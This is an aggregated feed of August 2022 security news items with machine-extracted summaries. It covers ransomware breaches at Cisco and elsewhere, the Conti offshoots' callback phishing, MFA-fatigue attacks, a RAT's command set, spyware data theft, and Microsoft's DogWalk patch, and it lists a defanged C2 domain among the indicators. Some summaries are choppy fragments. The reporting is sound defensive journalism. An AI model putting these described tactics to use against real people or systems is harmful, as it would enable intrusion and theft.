                Download the YARA signature for Zeppelin: YARA Signature, .yar 125 kb

                Technical Details

                Note: this advisory uses the MITRE ATT&CK® for Enterprise framework, version 11. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.

                Zep "

                Autosummary: Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI. Mitigations: The FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Zeppelin ransomware: Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud). REPORTING: The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Zeppelin actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. From 2019 through at least June 2022, actors have used this malware to target a wide range of businesses and critical infrastructure organizations, including defense contractors, educational institutions, manufacturers, technology companies, and especially organizations in the healthcare and medical industries. Once the ransomware is executed, a randomized nine-digit hexadecimal number is appended to each encrypted file as a file extension, e.g., file.txt.txt.C59-E0C-929 [T1486]. with password logins (e.g., service account, admin accounts, and domain admin accounts) with National Institute for Standards and Technology (NIST) standards for developing and managing password policies. "


                Years after claiming DogWalk wasn’t a vulnerability, Microsoft confirms flaw is being exploited and issues patch

                exploits
                2022-08-11 https://www.bitdefender.com/blog/hotforsecurity/years-after-claiming-dogwalk-wasnt-a-vulnerability-microsoft-confirms-flaw-is-being-exploited-and-issues-patch/
                This week Microsoft finally released a patch for a zero-day security flaw being exploited by hackers, that the company had claimed since 2019 was not actually a vulnerability. Read more in my article on the Hot for Security blog. "

                Autosummary: "


                Cisco has been hacked by a ransomware gang

                exploits ransomware
                2022-08-11 https://www.helpnetsecurity.com/2022/08/11/cisco-hacked/

                U.S. networking giant Cisco Systems has been hacked, the company confirmed on Wednesday, after Yanluowang ransomware operators claimed the attack on their leak site. #Yanluowang #ransomware is claiming to have breached #Cisco ! Without any further information, the group released a list of 8110 lines, showing folder names and possibly exfiltrated files. The word #Cisco only appears 94 times. More information in the screenshots below: pic.twitter.com/2c5shCSbF9 — Gitworm (@Gi7w0rm) August 10, 2022 But according to Cisco’s Talos … More

                The post Cisco has been hacked by a ransomware gang appeared first on Help Net Security.

                "

                Autosummary: The attackers then:
                • Escalated their privileges to “admin”, allowing them to log in to various systems (and this is when Cisco Security’s IT team noticed something was amiss)
                • Dropped remote access and offensive security tools
                • Added backdoor accounts and persistence mechanisms
                “Following initial access to the environment, the threat actor conducted a variety of activities for the purposes of maintaining access, minimizing forensic artifacts, and increasing their level of access to systems within the environment,” the team explained. "


                Cisco Confirms It’s Been Hacked by Yanluowang Ransomware Gang

                exploits ransomware
                2022-08-11 https://thehackernews.com/2022/08/cisco-confirms-its-been-hacked-by.html
                Networking equipment major Cisco on Wednesday confirmed it was the victim of a cyberattack on May 24, 2022 after the attackers got hold of an employee’s personal Google account that contained passwords synced from their web browser. "Initial access to the Cisco VPN was achieved via the successful compromise of a Cisco employee’s personal Google account," Cisco Talos said in a detailed write-up. "

                Autosummary: Furthermore, the actor is said to have deployed a variety of tools, including remote access utilities like LogMeIn and TeamViewer, offensive security tools such as Cobalt Strike, PowerSploit, Mimikatz, and Impacket aimed at increasing their level of access to systems within the network. "


                Zimbra auth bypass bug exploited to breach over 1,000 servers

                exploits
                2022-08-11 https://www.bleepingcomputer.com/news/security/zimbra-auth-bypass-bug-exploited-to-breach-over-1-000-servers/
                An authentication bypass Zimbra security vulnerability is being exploited to compromise Zimbra Collaboration Suite (ZCS) email servers worldwide. [...] "

                Autosummary: However, as Volexity warns, if vulnerable servers haven’t been patched against the RCE bug (CVE-2022-27925) before the end of May 2022, "you should consider your ZCS instance may be compromised (and thus all data on it, including email content, may be stolen) and perform a full analysis of the server. "


                Conti Cybercrime Cartel Using "BazarCall" Phishing Attacks as Initial Attack Vector

                financial
                2022-08-11 https://thehackernews.com/2022/08/conti-cybercrime-cartel-using-bazarcall.html
                Three different offshoots of the notorious Conti cybercrime cartel have resorted to the technique of call-back phishing as an initial access vector to breach targeted networks. "Three autonomous threat groups have since adopted and independently developed their own targeted phishing tactics derived from the call back phishing methodology," cybersecurity firm AdvIntel said in a Wednesday report. "

                Autosummary: " "As threat actors have realized the potentialities of weaponized social engineering tactics, it is likely that these phishing operations will only continue to become more elaborate, detailed, and difficult to parse from legitimate communications as time goes on," the researchers said. "


                US govt will pay you $10 million for info on Conti ransomware members

                exploits ransomware
                2022-08-11 https://www.bleepingcomputer.com/news/security/us-govt-will-pay-you-10-million-for-info-on-conti-ransomware-members/
                The U.S. State Department announced a $10 million reward today for information on five high-ranking Conti ransomware members, including showing the face of one of the members for the first time. [...] "

                Autosummary: U.S. govt reveals the first face of a Conti member Today, for the first time, the State Department revealed the face of a known Conti ransomware operator known as "Target," offering rewards of up to $10 million for information on him and four other members known as "Tramp," "Dandis," "Professor," and "Reshaev." After rebranding from Ryuk to Conti in the summer of 2020, the ransomware gang quickly rose in prominence as they attacked high-profile victims, including City of Tulsa, Broward County Public Schools, Advantech, and Ireland’s Health Service Executive (HSE) and Department of Health (DoH). "


                5 cybersecurity tips for students going back to school

                ciber
                2022-08-10 https://www.malwarebytes.com/blog/news/2022/08/5-cybersecurity-tips-for-students-going-back-to-school

                Categories: Personal

                The new school season is just around the corner. And while you are getting ready to go back to school, now is a good opportunity to check you are doing all you can to stay as safe as possible online.

                (Read more...)

                The post 5 cybersecurity tips for students going back to school appeared first on Malwarebytes Labs.

                "

                Autosummary: It"s on social media, SMS, chat platforms, gaming platforms, and other online watering holes, too. 5. Lock down your files The school does its part to secure your most important data, but you have a part to play, too. "


                Vicarius vsociety enables peer-to-peer networking and open-source collaboration on vulnerability research

                exploits
                2022-08-10 https://www.helpnetsecurity.com/2022/08/10/vicarius-vsociety/

                Vicarius announced at the Black Hat USA 2022 conference the release of vsociety, a social community for security professionals that aims to enable peer-to-peer networking and open-source collaboration on vulnerability research. In the short time since its inception, the vsociety community has proven itself as a valuable research hub, with multiple pieces of original research published exclusively to the cybersecurity social network. Among them, a new proof-of-concept exploit targeting Google SLO-Generator, posted by anonymous user … More

                The post Vicarius vsociety enables peer-to-peer networking and open-source collaboration on vulnerability research appeared first on Help Net Security.

                "

                Autosummary: “Knowledge sharing is critical to ensure growth of the Infosec community, and with vsociety’s community model and intuitive design, it is the best place to publish original research,” said ‘M’, researcher. "


                Cymulate improves risk visibility for businesses with new analytics capabilities

                industry
                2022-08-10 https://www.helpnetsecurity.com/2022/08/10/cymulate-xspm-platform/

                Cymulate announced the expansion of its Extended Security Posture Management (XSPM) Platform to include advanced insights and analytics capabilities. As businesses struggle to manage attack surfaces and validate security controls, these new data-driven capabilities significantly improve risk visibility and deliver actionable insights for reducing remediation time. Businesses also now gain enhanced levels of granularity for setting and tracking cybersecurity performance metrics and KPIs, which are required for improving cyber resilience. “Now, more than ever, organizations … More

                The post Cymulate improves risk visibility for businesses with new analytics capabilities appeared first on Help Net Security.

                "

                Autosummary: "


                SecurityScorecard provides a combination of services and platform to help CISOs manage cybersecurity risks

                ciber
                2022-08-10 https://www.helpnetsecurity.com/2022/08/10/securityscorecard-professional-services/

                At Black Hat USA 2022, SecurityScorecard announced the integration of its Professional Services offering with its ratings platform to provide a single point of orchestration to manage cybersecurity risks. SecurityScorecard’s Professional Services team can help any customer manage cybersecurity risk in concert with the industry’s largest and most comprehensive global, cyber risk data set, setting the industry standard for how cyber risk is quantified, measured and reduced. SecurityScorecard delivers strategic, proactive and acute-scenario services paired … More

                The post SecurityScorecard provides a combination of services and platform to help CISOs manage cybersecurity risks appeared first on Help Net Security.

                "

                Autosummary: “CISOs are under pressure to protect their organizations, and are now accountable to the Board of Directors, but they lack a single-point of orchestration for cybersecurity workflow and to define success,” said Aleksandr Yampolskiy, co-founder and CEO, SecurityScorecard. "


                CISA Issues Warning on Active Exploitation of UnRAR Software for Linux Systems

                exploits
                2022-08-10 https://thehackernews.com/2022/08/cisa-issues-warning-on-active.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a recently disclosed security flaw in the UnRAR utility to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. Tracked as CVE-2022-30333 (CVSS score: 7.5), the issue concerns a path traversal vulnerability in the Unix versions of UnRAR that can be triggered upon extracting a "

                Autosummary: "


                Microsoft Issues Patches for 121 Flaws, Including Zero-Day Under Active Attack

                exploits
                2022-08-10 https://thehackernews.com/2022/08/microsoft-issues-patches-for-121-flaws.html
                As many as 121 new security flaws were patched by Microsoft as part of its Patch Tuesday updates for the month of August, which also includes a fix for a Support Diagnostic Tool vulnerability that the company said is being actively exploited in the wild. Of the 121 bugs, 17 are rated Critical, 102 are rated Important, one is rated Moderate, and one is rated Low in severity. Two of the issues "

                Autosummary: The security update further remediates multiple remote code execution flaws in Windows Point-to-Point Protocol (PPP), Windows Secure Socket Tunneling Protocol (SSTP), Azure RTOS GUIX Studio, Microsoft Office, and Windows Hyper-V. The Patch Tuesday fix is also notable for addressing dozens of privilege escalation flaws: 31 in Azure Site Recovery, a month after Microsoft squashed 30 similar bugs in the business continuity service, five in Storage Spaces Direct, three in Windows Kernel, and two in the Print Spooler module. "


                VMware warns of public PoC code for critical auth bypass bug CVE-2022-31656

                exploits
                2022-08-10 https://securityaffairs.co/wordpress/134222/security/vmware-poc-code-cve-2022-31656.html

                VMware warns of the availability of a proof-of-concept exploit code for a critical authentication bypass flaw in multiple products. VMware warns its customers of the availability of a proof-of-concept exploit code for a critical authentication bypass flaw, tracked as CVE-2022-31656, in multiple products. The flaw was discovered by security researcher Petrus Viet from VNG Security, […]

                The post VMware warns of public PoC code for critical auth bypass bug CVE-2022-31656 appeared first on Security Affairs.

                "

                Autosummary: VMware warns its customers of the availability of a proof-of-concept exploit code for a critical authentication bypass flaw, tracked as CVE-2022-31656, in multiple products. "


                OPSWAT’s malware analysis capabilities protect ICS/OT environments against cyber threats

                exploits industry
                2022-08-10 https://www.helpnetsecurity.com/2022/08/10/opswat-metadefender-malware-analyzer/

                OPSWAT announced new malware analysis capabilities for IT and OT at the Black Hat USA 2022 conference. These enhancements include OPSWAT Sandbox for OT with detection of malicious communications on OT network protocols and support for open-source third-party tools in its MetaDefender Malware Analyzer solution. With increased threats and growing concerns around propagation into OT networks within critical infrastructure environments, threat intelligence for both the IT and OT sides of the business is essential in … More

                The post OPSWAT’s malware analysis capabilities protect ICS/OT environments against cyber threats appeared first on Help Net Security.

                "

                Autosummary: "


                Microsoft Patches ‘Dogwalk’ Zero-Day and 17 Critical Flaws

                exploits
                2022-08-10 https://threatpost.com/microsoft-patches-dogwalk-zero-day-and-17-critical-flaws/180378/
                August Patch Tuesday tackles 121 CVEs, 17 critical bugs and one zero-day bug exploited in the wild. "

                Autosummary: It’s almost triple the size of last year’s August release, and it’s the second largest release this year,” wrote Dustin Childs, Zero Day Initiative manager, in a Tuesday blog post. In related news, Adobe patched 25 CVEs on Tuesday tackling bugs in Adobe Acrobat and Reader, Commerce, Illustrator, FrameMaker and Adobe Premier Elements. "


                CISA adds UnRAR and Windows flaws to Known Exploited Vulnerabilities Catalog

                exploits
                2022-08-10 https://securityaffairs.co/wordpress/134230/security/cisa-unrar-windows-catalog.html

                The US Cybersecurity and Infrastructure Security Agency (CISA) adds vulnerabilities in the UnRAR utility to its Known Exploited Vulnerabilities Catalog. The Cybersecurity & Infrastructure Security Agency (CISA) has added a recently disclosed security flaw, tracked as CVE-2022-30333 (CVSS score: 7.5), in the UnRAR utility to its Known Exploited Vulnerabilities Catalog. The CVE-2022-30333 flaw is a path traversal […]

                The post CISA adds UnRAR and Windows flaws to Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

                "

                Autosummary: "


                Phishing attack abuses Microsoft Azure, Google Sites to steal crypto

                financial
                2022-08-10 https://www.bleepingcomputer.com/news/security/phishing-attack-abuses-microsoft-azure-google-sites-to-steal-crypto/
                A new large-scale phishing campaign targeting Coinbase, MetaMask, Kraken, and Gemini users is abusing Google Sites and Microsoft Azure Web App to create fraudulent sites. [...] "

                Autosummary: Landing page for Kraken phishing (Netskope) Targeting wallets and services The phishing campaign is currently attempting to steal MetaMask wallets and credentials for crypto exchanges, such as CoinBase, Kraken, and Gemini. "


                Microsoft urges Windows users to run patch for DogWalk zero-day exploit

                exploits
                2022-08-10 https://www.computerworld.com/article/3669434/microsoft-urges-windows-users-to-run-patch-for-dogwalk-zero-day-exploit.html#tk.rss_security

                Microsoft has confirmed that a high-severity, zero-day security vulnerability is actively being exploited by threat actors and is advising all Windows and Windows Server users to apply its latest monthly Patch Tuesday update as soon as possible.

                The vulnerability, known as CVE-2022-34713 or DogWalk, allows attackers to exploit a weakness in the Windows Microsoft Support Diagnostic Tool (MSDT). By using social engineering or phishing, attackers can trick users into visiting a fake website or opening a malicious document or file and ultimately gain remote code execution on compromised systems.

                To read this article in full, please click here

                "

                Autosummary: "


                Deepfence ThreatMapper 1.4 empowers organizations to visualize cloud native threat landscape

                financial
                2022-08-10 https://www.helpnetsecurity.com/2022/08/10/deepfence-threatmapper-1-4/

                Today, at Black Hat USA 2022, Deepfence announced the 1.4 release of its open source project ThreatMapper, a cloud native offering that expands attack path visualization, adds cloud security posture management, and now includes a cloud native, YARA-based malware scanner. ThreatMapper is an open platform for scanning, mapping, and ranking vulnerabilities in running pods, images, hosts, and repositories. ThreatMapper scans for known and unknown vulnerabilities, secrets, and cloud misconfigurations, and then puts those findings in context. With … More

                The post Deepfence ThreatMapper 1.4 empowers organizations to visualize cloud native threat landscape appeared first on Help Net Security.

                "

                Autosummary: ThreatMapper 1.4 includes:
                • ThreatGraph, a new feature that uses runtime context like network flows to prioritize threat scan results and enables organizations to narrow down attack path alerts from thousands to a handful of the most meaningful (and threatening)
                • Agentless cloud security posture management (CSPM) of cloud assets mapped to various compliance controls like CIS, HIPAA, GDPR, SOC 2, and more
                • YaraHunter, the industry’s first open source malware scanner for cloud native environments
                “The cloud native ecosystem is built on OSS libraries and components, yet the majority of tools available to secure cloud native workloads are closed source proprietary software that you can never fully understand how they work, and which only companies with deep pockets can afford. "


                Experts Uncover Details on Maui Ransomware Attack by North Korean Hackers

                exploits ransomware
                2022-08-10 https://thehackernews.com/2022/08/experts-uncover-details-on-maui.html
                The first ever incident possibly involving the ransomware family known as Maui occurred on April 15, 2021, aimed at an unnamed Japanese housing company. The disclosure from Kaspersky arrives a month after U.S. cybersecurity and intelligence agencies issued an advisory about the use of the ransomware strain by North Korean government-backed hackers to target the healthcare sector since at least "

                Autosummary: "Stonefly specializes in mounting highly selective targeted attacks against targets that could yield intelligence to assist strategically important sectors such as energy, aerospace, and military equipment," Symantec, a division of Broadcom Software, said in April. "


                Hackers behind Twilio data breach also targeted Cloudflare employees

                financial
                2022-08-10 https://securityaffairs.co/wordpress/134237/hacking/twilio-hackers-hit-cloudflare-employees.html

                Cloudflare revealed that at least 76 employees and their family members were targeted by smishing attacks similar to the one that hit Twilio. The content delivery network and DDoS mitigation company Cloudflare revealed this week that at least 76 employees and their family members received text messages on their personal and work phones. According to […]

                The post Hackers behind Twilio data breach also targeted Cloudflare employees appeared first on Security Affairs.


                Autosummary: “They came from four phone numbers associated with T-Mobile-issued SIM cards: (754) 268-9387, (205) 946-7573, (754) 364-6683 and (561) 524-5989.”


                Conti extortion gangs behind surge of BazarCall phishing attacks

                financial
                2022-08-10 https://www.bleepingcomputer.com/news/security/conti-extortion-gangs-behind-surge-of-bazarcall-phishing-attacks/
                At least three groups split from the Conti ransomware operation have adopted BazarCall phishing tactics as the primary method to gain initial access to a victim's network. [...]

                Autosummary: Impersonated brands: Sygnal Partners, iWired, Applied Automation Tech, RMM Central, Itarian, Auvik, RemotePC, RentoMojo, Parcel International, WhatFix, EZLynx, EATclub Canada, Standard Notes. Roy/Zeon shows off social engineering skills: AdvIntel researchers say that the choice to impersonate the above brands was based on the assessment that targeted employees would be more inclined to talk to vendors of software specific to their activity, which is less known outside the industry. For BazarCall phishing campaigns, Quantum impersonates a much larger number of brands, as observed by AdvIntel researchers: Ginyard International, “Azure Dragon” (Azure Storage), Oracle, HelloFresh, Luchechko Mortgage Team, US Equal Opportunity Employment Commission, CrowdStrike, Gobble. Regardless of the theme in the phishing email, the threat actor urged recipients to call a number for further clarifications. The researchers were able to identify eight other victims of Roy/Zeon’s BazarCall campaigns: a full-service landscaping company in Texas; a leading Italian producer of pharmaceuticals; a manufacturer of machined metal components; a specialized service center for Porsche, Bentley, Lamborghini, Audi, and Mercedes; a small Italian municipality; a Canadian electrical and instrumentation contractor; a large Canadian distributor of Mediterranean foods; and a city magazine focused on the Detroit area.


                Cisco hacked by Yanluowang ransomware gang, 2.8GB allegedly stolen

                exploits ransomware
                2022-08-10 https://www.bleepingcomputer.com/news/security/cisco-hacked-by-yanluowang-ransomware-gang-28gb-allegedly-stolen/
                Cisco confirmed today that the Yanluowang ransomware group breached its corporate network in late May and that the actor tried to extort them under the threat of leaking stolen files online. [...]

                Autosummary: "After obtaining initial access, the threat actor conducted a variety of activities to maintain access, minimize forensic artifacts, and increase their level of access to systems within the environment," Cisco Talos said.


                Hacker uses new RAT malware in Cuba Ransomware attacks

                exploits ransomware
                2022-08-10 https://www.bleepingcomputer.com/news/security/hacker-uses-new-rat-malware-in-cuba-ransomware-attacks/
                A member of the Cuba ransomware operation is employing previously unseen tactics, techniques, and procedures (TTPs), including a novel RAT (remote access trojan) and a new local privilege escalation tool. [...]

                Autosummary: ROMCOM RAT supports ten commands as listed below: return connected drive information; return file listings for a specified directory; start up a reverse shell under the name svchelper.exe within the %ProgramData% folder; upload data to C2 as a ZIP file, using IShellDispatch to copy files; download data and write it to worker.txt in the %ProgramData% folder; delete a specified file; delete a specified directory; spawn a process with PID


                Cisco fixes bug allowing RSA private key theft on ASA, FTD devices

                exploits
                2022-08-10 https://www.bleepingcomputer.com/news/security/cisco-fixes-bug-allowing-rsa-private-key-theft-on-asa-ftd-devices/
                Cisco has addressed a high severity vulnerability affecting its Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. [...]



                7-Eleven Denmark confirms ransomware attack behind store closures

                exploits ransomware
                2022-08-10 https://www.bleepingcomputer.com/news/security/7-eleven-denmark-confirms-ransomware-attack-behind-store-closures/
                7-Eleven Denmark has confirmed that a ransomware attack was behind the closure of 175 stores in the country on Monday. [...]



                Automotive supplier breached by 3 ransomware gangs in 2 weeks

                exploits ransomware industry
                2022-08-10 https://www.bleepingcomputer.com/news/security/automotive-supplier-breached-by-3-ransomware-gangs-in-2-weeks/
                An automotive supplier had its systems breached and files encrypted by three different ransomware gangs over a two-week span in May, two of the attacks happening within just two hours. [...]

                Autosummary: Breached three times within two months: after the initial compromise, LockBit, Hive, and ALPHV/BlackCat affiliates also gained access to the victim's network on April 20, May 1, and May 15, respectively.


                Open Cybersecurity Schema Framework project helps organizations detect and defend from cyberattacks

                ciber
                2022-08-10 https://www.helpnetsecurity.com/2022/08/11/open-cybersecurity-schema-framework/

                A coalition of cybersecurity and technology leaders announced an open-source effort to break down data silos that impede security teams. The Open Cybersecurity Schema Framework (OCSF) project, revealed at Black Hat USA 2022, will help organizations detect, investigate and stop cyberattacks faster and more effectively. The OCSF project was conceived and initiated by AWS and Splunk, building upon the ICD Schema work done at Symantec, a division of Broadcom. The OCSF includes contributions from 15 … More

                The post Open Cybersecurity Schema Framework project helps organizations detect and defend from cyberattacks appeared first on Help Net Security.


                Autosummary: The OCSF includes contributions from 15 additional initial members, including Cloudflare, CrowdStrike, DTEX, IBM Security, IronNet, JupiterOne, Okta, Palo Alto Networks, Rapid7, Salesforce, Securonix, Sumo Logic, Tanium, Trend Micro, and Zscaler. “We, as security vendors, need to do right by the security teams who work tirelessly to protect not only their organizations, but the greater community, against a constantly evolving array of threats,” said Sam Adams, Vice President of Detection and Response, Rapid7. “Cybersecurity is one of the most pressing challenges of the 21st century, and no single organization, agency, or vendor can solve it alone,” said Sridhar Muppidi, IBM Fellow, Vice President and Chief Technology Officer, IBM Security. “Security leaders are wrestling with integration gaps across an expanding set of application, service and infrastructure providers, and they need clean, normalized and prioritized data to detect and respond to threats at scale,” said Patrick Coughlin, Group Vice President Security Market, Splunk.


                Cisco was hacked by the Yanluowang ransomware gang

                exploits ransomware
                2022-08-10 https://securityaffairs.co/wordpress/134278/hacking/yanluowang-ransomware-hacked-cisco.html

                Cisco disclosed a security breach: the Yanluowang ransomware group breached its corporate network in late May and stole internal data. The investigation conducted by Cisco Security Incident Response (CSIRT) and Cisco Talos revealed that threat […]

                The post Cisco was hacked by the Yanluowang ransomware gang appeared first on Security Affairs.


                Autosummary: “After obtaining the user’s credentials, the attacker attempted to bypass multifactor authentication (MFA) using a variety of techniques, including voice phishing (aka “vishing”) and MFA fatigue, the process of sending a high volume of push requests to the target’s mobile device until the user accepts, either accidentally or simply to attempt to silence the repeated push notifications they are receiving.”


                Ransomware gangs move to "callback" social engineering attacks

                exploits
                2022-08-10 https://www.bleepingcomputer.com/news/security/ransomware-gangs-move-to-callback-social-engineering-attacks/
                At least three groups split from the Conti ransomware operation have adopted BazarCall phishing tactics as the primary method to gain initial access to a victim's network. [...]

                Autosummary: Impersonated brands: Sygnal Partners, iWired, Applied Automation Tech, RMM Central, Itarian, Auvik, RemotePC, RentoMojo, Parcel International, WhatFix, EZLynx, EATclub Canada, Standard Notes. Roy/Zeon shows off social engineering skills: AdvIntel researchers say that the choice to impersonate the above brands was based on the assessment that targeted employees would be more inclined to talk to vendors of software specific to their activity, which is less known outside the industry. For BazarCall phishing campaigns, Quantum impersonates a much larger number of brands, as observed by AdvIntel researchers: Ginyard International, “Azure Dragon” (Azure Storage), Oracle, HelloFresh, Luchechko Mortgage Team, US Equal Opportunity Employment Commission, CrowdStrike, Gobble. Regardless of the theme in the phishing email, the threat actor urged recipients to call a number for further clarifications. The researchers were able to identify eight other victims of Roy/Zeon’s BazarCall campaigns: a full-service landscaping company in Texas; a leading Italian producer of pharmaceuticals; a manufacturer of machined metal components; a specialized service center for Porsche, Bentley, Lamborghini, Audi, and Mercedes; a small Italian municipality; a Canadian electrical and instrumentation contractor; a large Canadian distributor of Mediterranean foods; and a city magazine focused on the Detroit area.


                Update now! Microsoft fixes two zero-days in August's Patch Tuesday

                exploits
                2022-08-10 https://www.malwarebytes.com/blog/news/2022/08/update-now-patch-tuesday-august-2022

                Categories: Exploits and vulnerabilities, News

                Tags: Microsoft, patch Tuesday, MSDT, NFS, PPP, Exchange, CVE-2022-34713, CVE-2022-35743, DogWalk, CVE-2022-30134, CVE-2022-24477, CVE-2022-24516, CVE-2022-30133, CVE-2022-34715, Adobe, Cisco, Google, Android, SAP, VMWare

                Patch Tuesday for August 2022 has come around. We take a look at the most important vulnerabilities that Microsoft has fixed, and a brief look at what other vendors did.


                The post Update now! Microsoft fixes two zero-days in August's Patch Tuesday appeared first on Malwarebytes Labs.


                Autosummary: Affected products are Microsoft Exchange Server 2016 CU 23, Microsoft Exchange Server 2019 CU 12, Microsoft Exchange Server 2019 CU 11, Microsoft Exchange Server 2016 CU 22, and Microsoft Exchange Server 2013 CU 23.


                Dissecting Google’s Titan M chip: Vulnerability research challenges

                exploits
                2022-08-09 https://www.helpnetsecurity.com/2022/08/09/titan-m-chip-vulnerability-research-challenges-video/

                The enterprise-grade Titan M security chip was custom built to help protect data. Derived from the same chip Google uses to protect its cloud data centers, it handles processes and information, such as passcode protection, encryption, and secure transactions in apps. In this Help Net Security video, Damiano Melotti, Security Researcher, Quarkslab, talks about the vulnerability research challenges encountered while exploring Google’s Titan M chip. If you’re attending Black Hat USA 2022, you can learn … More

                The post Dissecting Google’s Titan M chip: Vulnerability research challenges appeared first on Help Net Security.




                NetRise Platform provides continuous monitoring of XIoT firmware vulnerabilities

                ransomware industry
                2022-08-09 https://www.helpnetsecurity.com/2022/08/09/netrise-platform/

                NetRise released the NetRise Platform, which provides insights into shared vulnerabilities across XIoT firmware images in an organization. NetRise is a cloud-based SaaS platform that analyzes and monitors the firmware of XIoT devices. The firmware images are dissected, presenting all of the key data, artifacts, and risk in an easy-to-consume interface. As a result, NetRise reduces the time and cost of firmware security programs, allowing organizations to find and remediate previously undetected issues. … More

                The post NetRise Platform provides continuous monitoring of XIoT firmware vulnerabilities appeared first on Help Net Security.


                Autosummary: NetRise continuously monitors and analyzes artifacts within firmware to identify and prioritize: vulnerabilities (known and unknown); compliance adherence; software bill of materials (SBOM); misconfigurations; overall risk. Key features: vulnerability identification and monitoring; comprehensive SBOM; risk comparisons of new firmware versions to existing versions; vulnerability and other risk prioritization; correlation across all monitored devices; a firmware repository to query when new vulnerabilities are identified. “NetRise provides the perfect solution for mapping XIoT devices to traditional security processes,” said Michael Scott, Co-Founder & CTO of NetRise.


                Chinese Hackers Targeted Dozens of Industrial Enterprises and Public Institutions

                industry
                2022-08-09 https://thehackernews.com/2022/08/chinese-hackers-targeted-dozens-of.html
                Over a dozen military-industrial complex enterprises and public institutions in Afghanistan and Europe have come under a wave of targeted attacks since January 2022 to steal confidential data by simultaneously making use of six different backdoors. Russian cybersecurity firm Kaspersky attributed the attacks "with a high degree of confidence" to a China-linked threat actor tracked by Proofpoint

                Autosummary: Other backdoors utilized in the attacks include nccTrojan, Cotx, DNSep, Logtu, and a previously undocumented malware dubbed CotSam, so named owing to its similarities with Cotx.


                LogoKit update: The phishing kit leveraging open redirect vulnerabilities

                financial
                2022-08-09 https://www.helpnetsecurity.com/2022/08/09/logokit-open-redirect-vulnerabilities/

                Resecurity identified threat actors leveraging open redirect vulnerabilities in online services and apps to bypass spam filters to ultimately deliver phishing content. Using highly trusted service domains like Snapchat and other online-services, they create special URLs which lead to malicious resources with phishing kits. The kit identified is named LogoKit, which was previously used in attacks against the customers of Office 365, Bank of America, GoDaddy, Virgin Fly, and many other major financial institutions and … More

                The post LogoKit update: The phishing kit leveraging open redirect vulnerabilities appeared first on Help Net Security.




                Three ransomware gangs consecutively attacked the same network

                exploits ransomware
                2022-08-09 https://www.helpnetsecurity.com/2022/08/09/ransomware-gangs-attacks/

                Hive, LockBit and BlackCat, three prominent ransomware gangs, consecutively attacked the same network, according to Sophos. The first two attacks took place within two hours, and the third attack took place two weeks later. Each ransomware gang left its own ransom demand, and some of the files were triple encrypted. “It’s bad enough to get one ransomware note, let alone three,” said John Shier, senior security advisor at Sophos. “Multiple attackers create a whole new … More

                The post Three ransomware gangs consecutively attacked the same network appeared first on Help Net Security.


                Autosummary: Most of the initial infections for the attacks highlighted in the whitepaper occurred through either an unpatched vulnerability, with some of the most notable being Log4Shell, ProxyLogon, and ProxyShell, or poorly configured, unsecured Remote Desktop Protocol (RDP) servers.


                Twilio confirms data breach after its employees got phished

                financial
                2022-08-09 https://www.helpnetsecurity.com/2022/08/09/twilio-phished-data-breach/

                Cloud communications company Twilio has announced that some of its employees have been phished and that the attackers used the stolen credentials to gain access to some internal company systems and customer data. What happened? The attackers impersonated Twilio’s IT department and sent text messages to current and former Twilio employees, asking them to click on a link to update their passwords or check how their schedule has changed. “The URLs used words including “Twilio,” … More

                The post Twilio confirms data breach after its employees got phished appeared first on Help Net Security.


                Autosummary: “The URLs used words including “Twilio,” “Okta,” and “SSO” to try and trick users to click on a link taking them to a landing page that impersonated Twilio’s sign-in page,” the company explained.


                VMware warns of public exploit for critical auth bypass vulnerability

                exploits
                2022-08-09 https://www.bleepingcomputer.com/news/security/vmware-warns-of-public-exploit-for-critical-auth-bypass-vulnerability/
                Proof-of-concept exploit code is now publicly available online for a critical authentication bypass security flaw in multiple VMware products that enables attackers to gain admin privileges. [...]



                Maui ransomware operation linked to North Korean "Andariel" hackers

                exploits ransomware
                2022-08-09 https://www.bleepingcomputer.com/news/security/maui-ransomware-operation-linked-to-north-korean-andariel-hackers/
                The Maui ransomware operation has been linked to the North Korean state-sponsored hacking group "Andariel," known for using malicious cyber activities to generate revenue and causing discord in South Korea. [...]

                Autosummary: Andariel has been linked to ransomware attacks in the recent past, targeting South Korean companies in media, construction, manufacturing, and network services.


                Hackers install Dracarys Android malware using modified Signal app

                exploits
                2022-08-09 https://www.bleepingcomputer.com/news/security/hackers-install-dracarys-android-malware-using-modified-signal-app/
                Researchers have discovered more details on the newly discovered Android spyware "Dracarys," used by the Bitter APT group in cyberespionage operations targeting users from New Zealand, India, Pakistan, and the United Kingdom. [...]

                Autosummary: The data that Dracarys can collect and transmit to the C2 server include the following: contact list, SMS data, call logs, installed applications list, files, and GPS position. Finally, the spyware can capture screenshots from the device, record audio, and upload the media to the C2, which in the sample analyzed by Cyble was "hxxps://signal-premium-app[.]org".


                Twilio Suffers Data Breach After Employees Fall Victim to SMS Phishing Attack

                financial
                2022-08-09 https://thehackernews.com/2022/08/twilio-suffers-data-breach-after.html
                Customer engagement platform Twilio on Monday disclosed that a "sophisticated" threat actor gained "unauthorized access" using an SMS-based phishing campaign aimed at its staff to gain information on a "limited number" of accounts. The social-engineering attack was bent on stealing employee credentials, the company said, calling the as-yet-unidentified adversary "well-organized" and "methodical"

                Autosummary: The communications giant has 268,000 active customer accounts, and counts companies like Airbnb, Box, Dell, DoorDash, eBay, Glassdoor, Lyft, Salesforce, Stripe, Twitter, Uber, VMware, Yelp, and Zendesk among its clients.


                Chinese actors behind attacks on industrial enterprises and public institutions

                industry
                2022-08-09 https://securityaffairs.co/wordpress/134180/apt/china-apt-attacks-industrial-enterprises.html

                China-linked threat actors targeted dozens of industrial enterprises and public institutions in Afghanistan and Europe. In January 2022, researchers at Kaspersky ICS CERT uncovered a series of targeted attacks on military industrial enterprises and public institutions in Afghanistan and East Europe. The attackers breached dozens of enterprises and in some cases compromised their IT infrastructure, […]

